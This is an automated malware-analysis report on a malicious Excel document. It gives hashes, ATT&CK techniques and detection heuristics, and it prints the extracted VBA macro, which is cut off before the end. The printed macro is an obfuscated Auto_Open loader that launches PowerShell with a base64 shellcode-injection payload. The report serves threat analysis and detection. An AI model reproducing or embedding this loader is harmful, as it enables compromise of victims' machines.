Office (OLE) malware analysis — malicious · 5266a8a7ea3f05f8

MALICIOUS

Office (OLE)

105.5 KB Created: 2019-04-07 06:44:09 Authoring application: Microsoft Excel First seen: 2019-05-31

MD5: 567c6c92734709ba6c605f3c8f0e138f SHA-1: ad06ed2f813b801ef9cd4b95b5755547ba74cc07 SHA-256: 5266a8a7ea3f05f857b93b0d2439b29df0a485a6fe74b3ab3792ac98a3a94b63

280 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The Auto_Open VBA macro within this Excel document is designed to execute a PowerShell command. This command is obfuscated using string concatenation and appears to download and execute a second-stage payload. The macro uses CreateObject to initiate the execution, and the presence of the 'powershell' keyword, reassembled from split string literals, is a critical indicator of malicious intent. The document also contains a lure to encourage users to enable macros.

Heuristics 7

ClamAV: Doc.Downloader.Generic-6725370-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6725370-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70341 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70341 bytes
SHA-256: `8884b7dc2fda042d8bb784c79ea6c130aa812d3343d83b27f62dcb78cadf5e8b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Open() Dim rDLhoWyKh rDLhoWyKh = " /w 1 /C ""sv BhB -;sv BZ ec;sv w" rDLhoWyKh = rDLhoWyKh + "N ((gv BhB).value.toString()+(gv BZ).value.toS" rDLhoWyKh = rDLhoWyKh + "tring());" & "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " (gv wN).value.toString() ('J" rDLhoWyKh = rDLhoWyKh + "ABoAHEAPQAnACQAaABpAD0AJwAnAFsAdgBWAFgAKAAoACIAbQB" rDLhoWyKh = rDLhoWyKh + "zAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjA" rDLhoWyKh = rDLhoWyKh + "CAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFA" rDLhoWyKh = rDLhoWyKh + "AdAByACAARQBJAGgAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUAL" rDLhoWyKh = rDLhoWyKh + "AAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwB2AFYAWAA" rDLhoWyKh = rDLhoWyKh + "oACIAawBlAHIAbgBlAGwAIgArACIAMwAiACsAIgAyAC4AZABsA" rDLhoWyKh = rDLhoWyKh + "GwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGU" rDLhoWyKh = rDLhoWyKh + "AeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABBAGsAawAoAEkAb" rDLhoWyKh = rDLhoWyKh + "gB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQB" rDLhoWyKh = rDLhoWyKh + "iAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrA" rDLhoWyKh = rDLhoWyKh + "FMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHI" rDLhoWyKh = rDLhoWyKh + "AdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAc" rDLhoWyKh = rDLhoWyKh + "ABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwB" rDLhoWyKh = rDLhoWyKh + "DAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQA" rDLhoWyKh = rDLhoWyKh + "HQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsAdgBWAFg" rDLhoWyKh = rDLhoWyKh + "AKAAiAGsAZQByAG4AZQBsACIAKwAiADMAIgArACIAMgAuAGQAb" rDLhoWyKh = rDLhoWyKh + "ABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB" rDLhoWyKh = rDLhoWyKh + "lAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1A" rDLhoWyKh = rDLhoWyKh + "GEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHA" rDLhoWyKh = rDLhoWyKh + "AUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAI" rDLhoWyKh = rDLhoWyKh + "ABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwB" rDLhoWyKh = rDLhoWyKh + "QAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIAB6A" rDLhoWyKh = rDLhoWyKh + "GsAbQApADsAWwB2AFYAWAAoACIAbQBzAHYAYwByAHQALgBkAGw" rDLhoWyKh = rDLhoWyKh + "AbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZ" rDLhoWyKh = rDLhoWyKh + "QB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB" rDLhoWyKh = rDLhoWyKh + "0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0A" rDLhoWyKh = rDLhoWyKh + "CAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACc" rDLhoWyKh = rDLhoWyKh + "AJwA7ACQAaABpAD0AJABoAGkALgByAGUAcABsAGEAYwBlACgAI" rDLhoWyKh = rDLhoWyKh + "gBBAGsAawAiACwAIAAiAEMAcgAiACsAIgBlACIAKwAiAGEAdAB" rDLhoWyKh = rDLhoWyKh + "lAFQAaAByAGUAYQBkACIAKQA7ACQAaABpAD0AJABoAGkALgByA" rDLhoWyKh = rDLhoWyKh + "GUAcABsAGEAYwBlACgAIgBFAEkAaAAiACwAIAAiAGMAIgArACI" rDLhoWyKh = rDLhoWyKh + "AYQAiACsAIgBsAGwAbwBjACIAKQA7ACQAaABpAD0AJABoAGkAL" rDLhoWyKh = rDLhoWyKh + "gByAGUAcABsAGEAYwBlACgAIgB2AFYAWAAiACwAIAAiAEQAbAB" rDLhoWyKh = rDLhoWyKh + "sAEkAbQBwAG8AcgAiACsAIgB0ACIAKwAiACIAKQA7ACQAdwBSA" rDLhoWyKh = rDLhoWyKh + "D0AIgArAGYAYwAsACsAZQA4ACwAKwA4ADIALAArADAAMAAsACs" rDLhoWyKh = rDLhoWyKh + "AMAAwACwAKwAwADAALAArADYAMAAsACsAOAA5ACwAKwBlADUAL" rDLhoWyKh = rDLhoWyKh + "AArADMAMQAsACsAYwAwACwAKwA2ADQALAArADgAYgAsACsANQA" rDLhoWyKh = rDLhoWyKh + "wACwAKwAzADAALAArADgAYgAsACsANQAyACwAKwAwAGMALAArA" rDLhoWyKh = rDLhoWyKh + "DgAYgAsACsANQAyACwAKwAxADQALAArADgAYgAsACsANwAyACw" rDLhoWyKh = rDLhoWyKh + "AKwAyADgALAArADAAZgAsACsAYgA3ACwAKwA0AGEALAArADIAN" rDLhoWyKh = rDLhoWyKh + "gAsACsAMwAxACwAKwBmAGYALAArAGEAYwAsACsAMwBjACwAKwA" rDLhoWyKh = rDLhoWyKh + "2ADEALAArADcAYwAsACsAMAAyACwAKwAyAGMALAArADIAMAAsA" rDLhoWyKh = rDLhoWyKh + "CsAYwAxACwAKwBjAGYALAArADAAZAAsACsAMAAxACwAKwBjADc" rDLhoWyKh = rDLhoWyKh + "ALAArAGUAMgAsACsAZgAyACwAKwA1ADIALAArADUANwAsACsAO" rDLhoWyKh = rDLhoWyKh + "ABiACwAKwA1ADIALAArADEAMAAsACsAOABiACwAKwA0AGEALAA" rDLhoWyKh = rDLhoWyKh + "rADMAYwAsACsAOABiACwAKwA0AGMALAArADEAMQAsACsANwA4A" rDLhoWyKh = rDLhoWyKh + "CwAKwBlADMALAArADQAOAAsACsAMAAxACwAKwBkADEALAArADU" rDLhoWyKh = rDLhoWyKh + "AMQAsACsAOABiACwAKwA1ADkALAArADIAMAAsACsAMAAxACwAK" rDLhoWyKh = rDLhoWyKh + "wBkADMALAA ... (truncated)

SHA-256: 8884b7dc2fda042d8bb784c79ea6c130aa812d3343d83b27f62dcb78cadf5e8b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Auto_Open()
Dim rDLhoWyKh
rDLhoWyKh = " /w 1 /C ""sv BhB -;sv BZ ec;sv w"
rDLhoWyKh = rDLhoWyKh + "N ((gv BhB).value.toString()+(gv BZ).value.toS"
rDLhoWyKh = rDLhoWyKh + "tring());" & "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " (gv wN).value.toString() ('J"
rDLhoWyKh = rDLhoWyKh + "ABoAHEAPQAnACQAaABpAD0AJwAnAFsAdgBWAFgAKAAoACIAbQB"
rDLhoWyKh = rDLhoWyKh + "zAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjA"
rDLhoWyKh = rDLhoWyKh + "CAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFA"
rDLhoWyKh = rDLhoWyKh + "AdAByACAARQBJAGgAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUAL"
rDLhoWyKh = rDLhoWyKh + "AAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwB2AFYAWAA"
rDLhoWyKh = rDLhoWyKh + "oACIAawBlAHIAbgBlAGwAIgArACIAMwAiACsAIgAyAC4AZABsA"
rDLhoWyKh = rDLhoWyKh + "GwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGU"
rDLhoWyKh = rDLhoWyKh + "AeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABBAGsAawAoAEkAb"
rDLhoWyKh = rDLhoWyKh + "gB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQB"
rDLhoWyKh = rDLhoWyKh + "iAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrA"
rDLhoWyKh = rDLhoWyKh + "FMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHI"
rDLhoWyKh = rDLhoWyKh + "AdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAc"
rDLhoWyKh = rDLhoWyKh + "ABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwB"
rDLhoWyKh = rDLhoWyKh + "DAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQA"
rDLhoWyKh = rDLhoWyKh + "HQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsAdgBWAFg"
rDLhoWyKh = rDLhoWyKh + "AKAAiAGsAZQByAG4AZQBsACIAKwAiADMAIgArACIAMgAuAGQAb"
rDLhoWyKh = rDLhoWyKh + "ABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB"
rDLhoWyKh = rDLhoWyKh + "lAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1A"
rDLhoWyKh = rDLhoWyKh + "GEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHA"
rDLhoWyKh = rDLhoWyKh + "AUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAI"
rDLhoWyKh = rDLhoWyKh + "ABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwB"
rDLhoWyKh = rDLhoWyKh + "QAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIAB6A"
rDLhoWyKh = rDLhoWyKh + "GsAbQApADsAWwB2AFYAWAAoACIAbQBzAHYAYwByAHQALgBkAGw"
rDLhoWyKh = rDLhoWyKh + "AbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZ"
rDLhoWyKh = rDLhoWyKh + "QB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB"
rDLhoWyKh = rDLhoWyKh + "0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0A"
rDLhoWyKh = rDLhoWyKh + "CAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACc"
rDLhoWyKh = rDLhoWyKh + "AJwA7ACQAaABpAD0AJABoAGkALgByAGUAcABsAGEAYwBlACgAI"
rDLhoWyKh = rDLhoWyKh + "gBBAGsAawAiACwAIAAiAEMAcgAiACsAIgBlACIAKwAiAGEAdAB"
rDLhoWyKh = rDLhoWyKh + "lAFQAaAByAGUAYQBkACIAKQA7ACQAaABpAD0AJABoAGkALgByA"
rDLhoWyKh = rDLhoWyKh + "GUAcABsAGEAYwBlACgAIgBFAEkAaAAiACwAIAAiAGMAIgArACI"
rDLhoWyKh = rDLhoWyKh + "AYQAiACsAIgBsAGwAbwBjACIAKQA7ACQAaABpAD0AJABoAGkAL"
rDLhoWyKh = rDLhoWyKh + "gByAGUAcABsAGEAYwBlACgAIgB2AFYAWAAiACwAIAAiAEQAbAB"
rDLhoWyKh = rDLhoWyKh + "sAEkAbQBwAG8AcgAiACsAIgB0ACIAKwAiACIAKQA7ACQAdwBSA"
rDLhoWyKh = rDLhoWyKh + "D0AIgArAGYAYwAsACsAZQA4ACwAKwA4ADIALAArADAAMAAsACs"
rDLhoWyKh = rDLhoWyKh + "AMAAwACwAKwAwADAALAArADYAMAAsACsAOAA5ACwAKwBlADUAL"
rDLhoWyKh = rDLhoWyKh + "AArADMAMQAsACsAYwAwACwAKwA2ADQALAArADgAYgAsACsANQA"
rDLhoWyKh = rDLhoWyKh + "wACwAKwAzADAALAArADgAYgAsACsANQAyACwAKwAwAGMALAArA"
rDLhoWyKh = rDLhoWyKh + "DgAYgAsACsANQAyACwAKwAxADQALAArADgAYgAsACsANwAyACw"
rDLhoWyKh = rDLhoWyKh + "AKwAyADgALAArADAAZgAsACsAYgA3ACwAKwA0AGEALAArADIAN"
rDLhoWyKh = rDLhoWyKh + "gAsACsAMwAxACwAKwBmAGYALAArAGEAYwAsACsAMwBjACwAKwA"
rDLhoWyKh = rDLhoWyKh + "2ADEALAArADcAYwAsACsAMAAyACwAKwAyAGMALAArADIAMAAsA"
rDLhoWyKh = rDLhoWyKh + "CsAYwAxACwAKwBjAGYALAArADAAZAAsACsAMAAxACwAKwBjADc"
rDLhoWyKh = rDLhoWyKh + "ALAArAGUAMgAsACsAZgAyACwAKwA1ADIALAArADUANwAsACsAO"
rDLhoWyKh = rDLhoWyKh + "ABiACwAKwA1ADIALAArADEAMAAsACsAOABiACwAKwA0AGEALAA"
rDLhoWyKh = rDLhoWyKh + "rADMAYwAsACsAOABiACwAKwA0AGMALAArADEAMQAsACsANwA4A"
rDLhoWyKh = rDLhoWyKh + "CwAKwBlADMALAArADQAOAAsACsAMAAxACwAKwBkADEALAArADU"
rDLhoWyKh = rDLhoWyKh + "AMQAsACsAOABiACwAKwA1ADkALAArADIAMAAsACsAMAAxACwAK"
rDLhoWyKh = rDLhoWyKh + "wBkADMALAA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.